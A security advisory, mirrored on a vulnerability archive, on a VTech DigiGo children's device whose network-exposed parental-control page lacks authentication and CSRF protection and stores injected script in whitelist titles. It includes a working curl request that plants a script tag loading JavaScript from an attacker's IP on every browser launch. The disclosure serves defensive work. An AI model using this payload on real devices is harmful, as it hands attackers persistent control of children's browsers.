Twenty Year Anniversary

VTech DigiGo 83.60630 Browser Overlay Attack

VTech DigiGo 83.60630 Browser Overlay Attack
Posted Jan 15, 2018
Authored by Securify B.V., Sipke Mellema

VTech DigiGo with firmware 83.60630 suffers from a browser overlay attack vulnerability.

tags | exploit
MD5 | 77cea9e9382eded61fbed8053c84a2ad

VTech DigiGo 83.60630 Browser Overlay Attack

Change Mirror Download
------------------------------------------------------------------------
Multiple vulnerabilities in VTech DigiGo allow browser overlay attack
------------------------------------------------------------------------
Sipke Mellema, September 2017

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
VTech's DigiGo is a hand held smart device for children. The device
contains a browser that allows children to connect to websites on a
whitelist. Attackers can remotely add an entry to the whitelist to
perform a persistent overlay attack on the browser app.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was tested on a VTech DigiGo running firmware version
83.60630. It is likely that other versions are also affected.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
VTech pushed a firmware update to address this issue on 6 November,
2017. The firmware version still displays as 83.60630.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2017/multiple-vulnerabilities-in-vtech-digigo-allow-browser-overlay-attack.html

The internet browser of the DigiGo is designed for kids. Only whitelisted domains are allowed to be visited. The device contains an initial list of domains. When the browser is opened, a control menu is displayed. From the control menu a kid can visit websites from a whitelist. The control menu also includes the Parental Control menu, that allows adding domains to the whitelist. Both menu's are HTML pages running on a webserver on the DigiGo. The webserver gets started when opening the browser.

In the examples below the IP address of the DigiGo is 192.168.1.152, and the attacker has the IP address 192.168.1.142.


Parental control is accessible from the network

An internal webserver is started on the DigiGo when the browser is started. This webserver doesn't just listen on a loopback interface, but is accessible from anywhere on the network. The link for the Parental Control menu is:

http://192.168.1.152/wwwsrc/Parental_Control.html


Missing Cross-Site Request Forgery in domain whitelist form

The form to add domains to the whitelist does not require any authentication, and it's not protected against CSRF-attacks. These properties allow an attacker to remotely inject domains to the whitelist. To add a domain, a POST request is performed to:

http://192.168.1.152/UpdatePA.cgi


Persistent Cross-Site Scripting in domain whitelist

Domains in the whitelist have a title and a description. The title attribute can be injeted with malicious Javascript. Whitelisted domains are listed on the internal HTML page every time the browser is opened.
Putting it together


When the browser is started, a webserver is started on the DigiGo. The browser will display pages from its local webserver, and those pages include the whitelisted domains. Domains can be remotely injected to hijack the page on the internal webserver, allowing changes to the entire browser window.

If a device on the same network as the DigiGo visits an attacker controlled domain, it's possible to remotely attack the DigiGo via Cross-Site Request Forgery. For this attack to work the attacker has to know the DigiGo's IP address in advance, or scan the network via Javascript.

If the attacker is on the same network, injecting a domain with a malicious title is as simple as:

curl --data "ACTION=0&ITEMID=-1&TITLE=hax%3Cscript+src%3D%22http%3A%2F%2F192.168.1.142%3A1234%2Finject.js%22%2F%3E&URL=http%3A%2F%2Fwww.securify.nl&DOMAIN=securify.nl&ICON=nil&DESC=Injecting+backdoor+into+browser" http://192.168.1.152/cgi-bin/UpdatePA.cgi

The browser will now include Javascript from http://192.168.1.142:1234/inject.js every time the browser is opened, rendering the browser in control of the attacker.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

August 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    19 Files
  • 2
    Aug 2nd
    17 Files
  • 3
    Aug 3rd
    16 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    1 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    15 Files
  • 8
    Aug 8th
    9 Files
  • 9
    Aug 9th
    7 Files
  • 10
    Aug 10th
    10 Files
  • 11
    Aug 11th
    1 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    14 Files
  • 14
    Aug 14th
    18 Files
  • 15
    Aug 15th
    38 Files
  • 16
    Aug 16th
    16 Files
  • 17
    Aug 17th
    22 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close